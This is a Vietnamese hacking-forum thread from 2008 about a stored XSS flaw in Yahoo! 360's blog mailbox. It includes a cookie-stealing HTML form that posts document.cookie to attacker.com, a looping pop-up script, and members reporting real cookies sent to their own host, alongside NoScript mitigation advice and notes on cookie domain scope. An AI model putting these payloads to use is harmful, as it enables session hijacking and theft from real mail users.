banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits [Thảo luận] Bug MailBox của Yahoo! 360  XML
  [Discussion]   [Thảo luận] Bug MailBox của Yahoo! 360 02/01/2008 07:00:29 (+0700) | #1 | 107599
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Hôm nay chả biết ở đâu anh NLFB gửi cái hình này:


Số là blog đó bị ai chèn cái script vào Message. Mở ra thì gặp vậy.
Hai anh em ngồi mò một chút cũng biết thêm được chút ít. Trong phần Message của Mailbox, mình có thể sử dụng script được.
VD:
<script>alert("Hello. Tui la Bigball")</script> 

và cũng có thể steal cookies của victim được.
Xin anh em cho ý kiến về bug này và theo mọi người thì cái này có thể exploit thêm được gì từ đây nữa không?
Cảm ơn anh em đã xem.
Bigball.
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 02/01/2008 07:02:43 (+0700) | #2 | 107600
[Avatar]
nlfb
Journalist

[Minus]    0    [Plus]
Joined: 09/07/2003 16:41:21
Messages: 1175
Location: HCM
Offline
[Profile] [PM] [Yahoo!]
Ừm, em bảo Bigball post cái này lên, lỗi này em nhận được từ một câu hỏi trên mạng thôi, nên em nghĩ việc cho phép sử dụng thẻ <script> trong message của Y360 có thể gây nguy hiểm. Còn khả năng hạn chế nên chỉ dám ngồi nghe smilie
[Up] [Print Copy]
  [Question]   Re:[Thảo luận] Bug MailBox của Yahoo! 360 02/01/2008 12:02:51 (+0700) | #3 | 107659
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Mong MOD move ra ngoài dùm vì theo mình được biết cái này đã xuất hiện cách đây vài ngày rồi nên rất nhiều người biết được nên đem ra ngoài có lẽ tiện thảo luận hơn.
Hy vọng các bạn thảo luận nhiệt tình.
Bigball
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 02/01/2008 23:20:13 (+0700) | #4 | 107738
[Avatar]
gamma95
Researcher

Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
2 bác Bigball+nlfb cho mình thắc mắc 1 tí về XSS
1. giả sử mình chôm đc cookie khi victim ghé thăm cái link XSS http://message.360.yahoo.com, thì cookie này thể lợi dụng để làm giả cookie của victim tại http://mail.yahoo.com ko?? tại sao? Tổng quát thì thế nào ??
2. giả sử tui là một nhà cung cấp free hosting, mỗi member khi đăng kí thì URL có dạng
http://freehost.xxx/~user1/
http://freehost.xxx/~user2/
thằng user2 nó có 1 cái forum -->url có dạng
http://freehost.xxx/~user2/forum
(và giả sử forum này ko hề bị lỗi xss)
thì thằng user1 muốn chôm cookie của thằng user2 có được ko ?? nếu có thì bằng cách nào??
Thằng admin gamma95 có cái forum để cho khách hàng ý kiến, thì thằng admin gamma95 nên để forum dưới dạng
http://freehost.xxx/forum
hay là
http://forum.freehost.xxx
tại sao?

ps: lỗi này bác nào tìm ra vậy ?
Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Question]   Re:[Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 08:20:48 (+0700) | #5 | 107858
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]

gamma95 wrote:
2 bác Bigball+nlfb cho mình thắc mắc 1 tí về XSS
1. giả sử mình chôm đc cookie khi victim ghé thăm cái link XSS http://message.360.yahoo.com, thì cookie này thể lợi dụng để làm giả cookie của victim tại http://mail.yahoo.com ko?? tại sao? Tổng quát thì thế nào ??
2. giả sử tui là một nhà cung cấp free hosting, mỗi member khi đăng kí thì URL có dạng
http://freehost.xxx/~user1/
http://freehost.xxx/~user2/
thằng user2 nó có 1 cái forum -->url có dạng
http://freehost.xxx/~user2/forum
(và giả sử forum này ko hề bị lỗi xss)
thì thằng user1 muốn chôm cookie của thằng user2 có được ko ?? nếu có thì bằng cách nào??
Thằng admin gamma95 có cái forum để cho khách hàng ý kiến, thì thằng admin gamma95 nên để forum dưới dạng
http://freehost.xxx/forum
hay là
http://forum.freehost.xxx
tại sao?

ps: lỗi này bác nào tìm ra vậy ? 

Em không rành về mấy cái XSS này lắm nên em chỉ trả lời theo suy nghĩ của em thôi. Có sai các bác đừng cười mà giúp em sửa sai nhé smilie
1. Mình test thử thì dù lấy được cookie nhưng vẫn không fake được. Và nếu có thể fake để vào được message của đối phương đi chăng nữa thì chưa chắc là http://mail.yahoo.com có cùng cấu trúc cookie với http://message.360.com
2.
2.1/ Fourm dạng gì? Nếu forum đó dính XSS thì có thể lấy được. Hoặc có thể dụ victim vào 1 link nào đó có logger để chôm cookie
2.2/ Nếu bình thường thì để dạng nào cũng được cả. Nhưng trong trường hợp free host thì không thể nào có subdomain dạng http://forum.freehost.xxx cả. Trừ phi lúc đăng ký nó cho mình subdomain và subdomain http://forum.freehost.xxx. Khác nhau duy nhất là nếu chúng ta có thể wwwect http://forum.freehost.xxx sang một IP khác (host, server...) còn http://forum.xxx/forum là một folder trên host và muốn wwwect nó phải sử dụng script.
Em xin hết. Các bác đừng cười em nhá. Có gì sai thì giúp em sửa với.
=====
P.S: Anh NLFB đâu rồi? Không giúp em chạy mất rồi hả smilie
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 10:27:42 (+0700) | #6 | 107904
[Avatar]
blueocean89
Member

[Minus]    0    [Plus]
Joined: 31/08/2007 12:06:33
Messages: 156
Location: r00f
Offline
[Profile] [PM]
Có bác nào biết paswords trong yahoo được mã hoá bằng gì không ? [MD5?] Nếu MD5 thì có thể chút hy vọng với loại pass thông thường; còn nếu không phải thì e lấy được cookie trong 360 cũng chưa làm nên chuyện. [như BigballVN nhận xét về cấu trúc cookie] Nếu cookie không được dùng "nóng" thì cũng như không. smilie

@edit: thêm cái p/s: Cái bug này thật không tin nổi!
trons pacrette tiolpsatem otkin ypacs
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 10:33:57 (+0700) | #7 | 107906
[Avatar]
Ikut3
Elite Member

[Minus]    0    [Plus]
Joined: 24/09/2007 23:47:03
Messages: 1429
Location: Nhà hát lớn
Offline
[Profile] [PM] [Yahoo!]
Xin được lạc đề 1 tí .Hôm qua chat với ku Bigball cũng được lão ấy nghía cho qua cái bug này .Tìm hiểu 1 hồi thì tìm ra được điều này :
Trước đây, hàng loạt các hộp thư của Yahoo bị mất mật khẩu hay bị đọc trộm thư mà không rõ nguyên nhân. Có lẽ khi đó các bạn mở các bức thư mà không hề cảnh giác với XSS, đâu phải chỉ các file đính kèm mới có thể gây nguy hiểm cho bạn. Chỉ cần với một đoạn mã HTML gửi trong thư bạn đã hoàn toàn bị mất cookie của mình:

Code:
<form action="[b]http://attacker.com/save.asp[/b]" method="post" name="XSS">
<input type="hidden" name="cookie">
</form>
<img border="0" onmouseover="window.document.XSS.cookie.value = document.cookie; window.document.XSS.submit();" src="none.jpg">


Vậy là khi bạn nhận thư, và nếu bạn vô tình đưa con chuột qua bức ảnh gửi kèm thì cũng có nghĩa là bạn đã bị lấy mất cookie. Và với cookie lấy được, các hacker có thể dễ dàng login hòm thư của bạn mà không cần biết mật khẩu của bạn.Tuy nhiên sau này bug này đã được Yahoo FIX

Cookies của VICTIM sẽ được khai thác như thế nào ?.Nó được mã hóa bằng cái gì ?
Xin được hướng dẫn FIX bug này luôn (Giành cho ai là BLOGGER smilie)

Bạn cài Add On này cho Fire Fox:

https://addons.mozilla.org/en-US/firefox/addon/1237

Và tắt Java Script đi là xong!










[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 10:55:11 (+0700) | #8 | 107909
[Avatar]
onlinehack
Member

[Minus]    0    [Plus]
Joined: 04/12/2007 23:07:12
Messages: 116
Location: Ma maison
Offline
[Profile] [PM]

Cái Mail bug của Ikut3 thì Yahoo fix khoảng 5 năm rồi thì phải smilie
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 11:20:13 (+0700) | #9 | 107914
[Avatar]
Ikut3
Elite Member

[Minus]    0    [Plus]
Joined: 24/09/2007 23:47:03
Messages: 1429
Location: Nhà hát lớn
Offline
[Profile] [PM] [Yahoo!]
Nó cũng tương tự như cái bây giờ đấy .Tại sao Mail của Blog lại kô nằm cùng với Mail chính nhỉ
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 11:47:38 (+0700) | #10 | 107916
[Avatar]
gamma95
Researcher

Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
@ikut3: blog360 của yahoo xài ajax mà cấm chạy javascript thì sao nhể? với lại cậu cấm javascript nhưng nó chơi VBscript thì sao ta ??
@Bigball: Vì cậu ko đọc kỹ câu hỏi nên 3 câu trả lời hoàn toàn .. không chính xác.

Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 12:08:22 (+0700) | #11 | 107921
[Avatar]
onlinehack
Member

[Minus]    0    [Plus]
Joined: 04/12/2007 23:07:12
Messages: 116
Location: Ma maison
Offline
[Profile] [PM]

Ikut3 wrote:
Nó cũng tương tự như cái bây giờ đấy .Tại sao Mail của Blog lại kô nằm cùng với Mail chính nhỉ 

Hồi đó Yahoo fix gần hết các bug XSS, chỉ còn lại bug của bồ. Cho nên cái bug mới này, tớ thấy kì kì smilie
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 12:13:57 (+0700) | #12 | 107924
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]

gamma95 wrote:
@ikut3: blog360 của yahoo xài ajax mà cấm chạy javascript thì sao nhể? với lại cậu cấm javascript nhưng nó chơi VBscript thì sao ta ??
@Bigball: Vì cậu ko đọc kỹ câu hỏi nên 3 câu trả lời hoàn toàn .. không chính xác.

 

Ngay từ đầu em cũng không nghĩ là mình đúng. Nhưng vì muốn nghe câu trả lời từ anh gamma95. Vậy anh hãy tự trả lời những câu hỏi của mình để em biết chỗ sai của mình.
Thân.
Bigball
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 12:24:52 (+0700) | #13 | 107928
[Avatar]
Ikut3
Elite Member

[Minus]    0    [Plus]
Joined: 24/09/2007 23:47:03
Messages: 1429
Location: Nhà hát lớn
Offline
[Profile] [PM] [Yahoo!]
Code:
<script>
for(i=1 ; i<1000 ; i++)
{
alert('Hãy Change Pass! Mật khẩu này đã bị iku3 xâm nhập  !');
window.open("http://360.yahoo.com/058113");
}
</script>


Hùm đúng là với đoạn COde này khi Disable JAVA đi thì kô còn tác dụng gì nữa smilie
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 12:31:34 (+0700) | #14 | 107932
[Avatar]
gamma95
Researcher

Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
@ikut: ý cậu là gì? cậu có nhầm lẫn nữa java và javascript ko ??
@bigball: tôi chỉ nói là cậu ko đọc kỹ đề, chứ ko có ý gì khác, hãy suy nghĩ thêm chút nữa ... ko việc gì mà tô đỏ mấy dòng chứ như vậy .. nghe căng thẳng quá smilie
Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 12:50:21 (+0700) | #15 | 107936
[Avatar]
blueocean89
Member

[Minus]    0    [Plus]
Joined: 31/08/2007 12:06:33
Messages: 156
Location: r00f
Offline
[Profile] [PM]
anh nlfb này, hình như hiện giờ thì không còn tác dụng của tag <script> nữa, anh check lại thử coi.
trons pacrette tiolpsatem otkin ypacs
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 12:56:33 (+0700) | #16 | 107940
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Hiện giờ mình đã tìm được 1 cách để chặn bug này lại dành cho ai log vào mailbox trong Y!360. Một sự lựa chọn khác ngoài cách của Ikut3.
Download add on NoScript tại https://addons.mozilla.org/en-US/firefox/addon/722
Sau khi cài đặt restart lại FireFox.
Sau đó khi vào Y!360 thì chọn như hình

Thế là xong. Log In bình thường và bug trên không làm gì được bạn nữa.
Sau khi check mailbox xong và không phát hiện gì khả nghi thì bạn có thể Allow yahoo lại.
@gamma95: OK. Em đang suy nghĩ về câu hỏi của anh. Nhưng hơi khó so với đứa không rành XSS như em /smilie Khi nào nghĩ ra em sẽ reply lại thật hoành tráng.
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 13:14:45 (+0700) | #17 | 107949
[Avatar]
meomeo_bebong
Locked

[Minus]    0    [Plus]
Joined: 27/06/2006 23:07:44
Messages: 700
Location: vô gia cư
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN] [ICQ]
Thế cho em 1 câu ngoài lề nhé : với những ai dùng các trình duyệt khác như IE 7 ; IE 6 ; IE 5 ; Opera ;
Nescape ..... thì chặn bug này kiểu gì ạ smilie
Điều kiện : k0 sửa cấu hình trình duyệt , k0 dùng thêm các addon , toolbar smilie
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 13:29:41 (+0700) | #18 | 107953
[Avatar]
blueocean89
Member

[Minus]    0    [Plus]
Joined: 31/08/2007 12:06:33
Messages: 156
Location: r00f
Offline
[Profile] [PM]

meomeo_bebong wrote:
Thế cho em 1 câu ngoài lề nhé : với những ai dùng các trình duyệt khác như IE 7 ; IE 6 ; IE 5 ; Opera ;
Nescape ..... thì chặn bug này kiểu gì ạ smilie
Điều kiện : k0 sửa cấu hình trình duyệt , k0 dùng thêm các addon , toolbar smilie 


Đơn giản là khỏi làm gì hết vì bây giờ 02/01/08 cái bug này nãy giờ tôi "thử" coi sao mà chả có gì xảy ra. [Chẳng biết mình có gà mờ mà ghi trật tới tag script ko nữa...]

@edit: Ok! check đi check lại vẫn hơi thất vọng vì dường như chỉ alert và prompt là chạy dc.... nhưng có một điều khá hay là có thể khai biến: var Giờ khuya quá rồi, đi ngủ đã mai mò mẫn tiếp coi còn thứ nào chơi dc ko ^^ Tuy nhiên cũng có trò hay để tỉnh tò với cô bạn rồi.
var a = .....
alert('.....'+ a) lol trò con nít! Xin các bác cứ chê cười.
trons pacrette tiolpsatem otkin ypacs
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 15:34:50 (+0700) | #19 | 107963
[Avatar]
onlinehack
Member

[Minus]    0    [Plus]
Joined: 04/12/2007 23:07:12
Messages: 116
Location: Ma maison
Offline
[Profile] [PM]
Nếu không nhầm thì gamma định nói đến cái này :


If you use cookies in your website, a cookie set from a subdomain
cannot be read from the main domain and vice versa because of the security
association feature tied to the domain which set it. This is also true for
session cookies, where, if the user is logged in on the main site, and
then moves to a subdomain, the subdomain site will not be able to access the
same session cookie, and will assign a new session (hence forcing the user
to login again). However, session persistence
across subdomains can be maintained by implementing URL rewriting instead
of session cookies.
 


và cái này

As explained earlier, cookies are not shared among subdomains or between the domain
and the subdomain. In order to set cookies accessible by all subdomains, use the
following techniques:


1. While writing the cookie, set the cookie domain to ".domain.ext" so that it applies
to all subdomains.

2. If the cookie domain is set to ".domain.ext", it will not be accessible by a user
who types in the address without the www before the domain (i.e. http://domain.ext).
Therefore, wwwect all requests without www to http://www.domain.ext.


There are some reported problems with the above approach. It is safe to set the default cookie
with no domain specified and then set another one with domain as ".domain.ext". In this case
there is no need for the wwwects.
However, remember that session cookies are set by the web server software and you may not
have control over how the cookie domain is set.
 


đủ chưa nhỉ smilie
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 16:44:43 (+0700) | #20 | 107965
[Avatar]
nlfb
Journalist

[Minus]    0    [Plus]
Joined: 09/07/2003 16:41:21
Messages: 1175
Location: HCM
Offline
[Profile] [PM] [Yahoo!]

blueocean89 wrote:
anh nlfb này, hình như hiện giờ thì không còn tác dụng của tag <script> nữa, anh check lại thử coi.  

Thử rồi, kết quả là cookies tiếp tục bay về host của ku bigball smilie .
Về cái trình chặn NoScript thì em đã dùng từ hồi huynh mrro giới thiệu ở VNSECON'07 roài, nhưng hiện tại dùng nhiều nhất đâu phải là FF mà là IE 6 không hà smilie
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 03/01/2008 23:14:02 (+0700) | #21 | 107992
[Avatar]
gamma95
Researcher

Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
@onlinehack: rite smilie !
Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 04/01/2008 00:44:19 (+0700) | #22 | 108022
[Avatar]
blueocean89
Member

[Minus]    0    [Plus]
Joined: 31/08/2007 12:06:33
Messages: 156
Location: r00f
Offline
[Profile] [PM]

nlfb wrote:

blueocean89 wrote:
anh nlfb này, hình như hiện giờ thì không còn tác dụng của tag <script> nữa, anh check lại thử coi.  

Thử rồi, kết quả là cookies tiếp tục bay về host của ku bigball smilie .
 


Các anh dùng một đoạn PHP tren host ? hay dùng Perl ?
trons pacrette tiolpsatem otkin ypacs
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 04/01/2008 00:51:14 (+0700) | #23 | 108027
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]

blueocean89 wrote:

nlfb wrote:

blueocean89 wrote:
anh nlfb này, hình như hiện giờ thì không còn tác dụng của tag <script> nữa, anh check lại thử coi.  

Thử rồi, kết quả là cookies tiếp tục bay về host của ku bigball smilie .
 


Các anh dùng một đoạn PHP tren host ? hay dùng Perl ? 

Mình dùng PHP
@onlinehack: Thanks smilie
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 04/01/2008 01:03:35 (+0700) | #24 | 108029
[Avatar]
gamma95
Researcher

Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa&quot;&gt;
Offline
[Profile] [PM] [ICQ]
Ah khoan, các bác cứ trả lời câu hỏi của tui đi chứ ... chiện nào ra chiện đó, xem có bói đúng quẻ ko? :d
Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 04/01/2008 02:14:12 (+0700) | #25 | 108044
[Avatar]
onlinehack
Member

[Minus]    0    [Plus]
Joined: 04/12/2007 23:07:12
Messages: 116
Location: Ma maison
Offline
[Profile] [PM]

Hình như bình thường mình login bằng login.yahoo.com
Hình như khi gõ yahoo.com -> www.yahoo.com smilie
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 06/01/2008 03:08:09 (+0700) | #26 | 108554
[Avatar]
Huyxvn
Member

[Minus]    0    [Plus]
Joined: 30/08/2007 21:42:56
Messages: 21
Location: Fotech
Offline
[Profile] [PM] [WWW] [Yahoo!]
Lỗi này đc cái nghịch cũng vui, chưa biết có khai thác đc j ko. Dám bào nếu gửi cái này cho ai thì người đó cả đời ko vào đc Inbox nữa (nếu ko biết chặn Script rồi del cái ms đó đi), dùng vòng lặp cho hiện ra hàng loạt alert cũng vui phết. Tiện thể quảng cáo mấy cái trang web. Rồi cũng có thể tăng Page View của blog mình bằng cách này
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 06/01/2008 03:23:37 (+0700) | #27 | 108561
[Avatar]
onlinehack
Member

[Minus]    0    [Plus]
Joined: 04/12/2007 23:07:12
Messages: 116
Location: Ma maison
Offline
[Profile] [PM]

Huyxvn wrote:
Lỗi này đc cái nghịch cũng vui, chưa biết có khai thác đc j ko. Dám bào nếu gửi cái này cho ai thì người đó cả đời ko vào đc Inbox nữa (nếu ko biết chặn Script rồi del cái ms đó đi), dùng vòng lặp cho hiện ra hàng loạt alert cũng vui phết. Tiện thể quảng cáo mấy cái trang web. Rồi cũng có thể tăng Page View của blog mình bằng cách này 


Đúng là .. chán thật smilie
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 14/01/2008 15:58:18 (+0700) | #28 | 110174
[Avatar]
chupichu
Elite Member

[Minus]    0    [Plus]
Joined: 16/07/2004 14:17:57
Messages: 229
Location: Lầu Xanh
Offline
[Profile] [PM] [Yahoo!]
Gửi Ikut3: Bạn nên ghi rõ nguồn gốc 2 tấm hình nhé smilie Vì tớ biết chắc đó ko phải của bạn.


Nói thêm về cái "bug" này, nó chỉ là cái lỗi cho phép chạy script trên mail box có chứa đoạn lệnh "alert, prompt". Và qua cái "bug" này ko thể lấy được password, thậm chí là passhash
Where Have You Gone..
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 14/01/2008 23:11:36 (+0700) | #29 | 110212
[Avatar]
blueocean89
Member

[Minus]    0    [Plus]
Joined: 31/08/2007 12:06:33
Messages: 156
Location: r00f
Offline
[Profile] [PM]

chupichu wrote:
Gửi Ikut3: Bạn nên ghi rõ nguồn gốc 2 tấm hình nhé smilie Vì tớ biết chắc đó ko phải của bạn.


Nói thêm về cái "bug" này, nó chỉ là cái lỗi cho phép chạy script trên mail box có chứa đoạn lệnh "alert, prompt". Và qua cái "bug" này ko thể lấy được password, thậm chí là passhash 


Thế nếu thế này thì sao nhỉ : <script src='blah blah..."> </script> smilie
trons pacrette tiolpsatem otkin ypacs
[Up] [Print Copy]
  [Question]   Re: [Thảo luận] Bug MailBox của Yahoo! 360 14/01/2008 23:14:51 (+0700) | #30 | 110213
[Avatar]
blueocean89
Member

[Minus]    0    [Plus]
Joined: 31/08/2007 12:06:33
Messages: 156
Location: r00f
Offline
[Profile] [PM]

blueocean89 wrote:

chupichu wrote:
Gửi Ikut3: Bạn nên ghi rõ nguồn gốc 2 tấm hình nhé smilie Vì tớ biết chắc đó ko phải của bạn.


Nói thêm về cái "bug" này, nó chỉ là cái lỗi cho phép chạy script trên mail box có chứa đoạn lệnh "alert, prompt". Và qua cái "bug" này ko thể lấy được password, thậm chí là passhash 


Thế nếu thế này thì sao nhỉ : <script src='blah blah..."> </script> smilie

@edit: Có bác nào giúp khai thác chút thông tin từ mớ cookie nguội ngắt trên host em cái smilie vẫn chưa làm dc gì cả smilie
trons pacrette tiolpsatem otkin ypacs
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|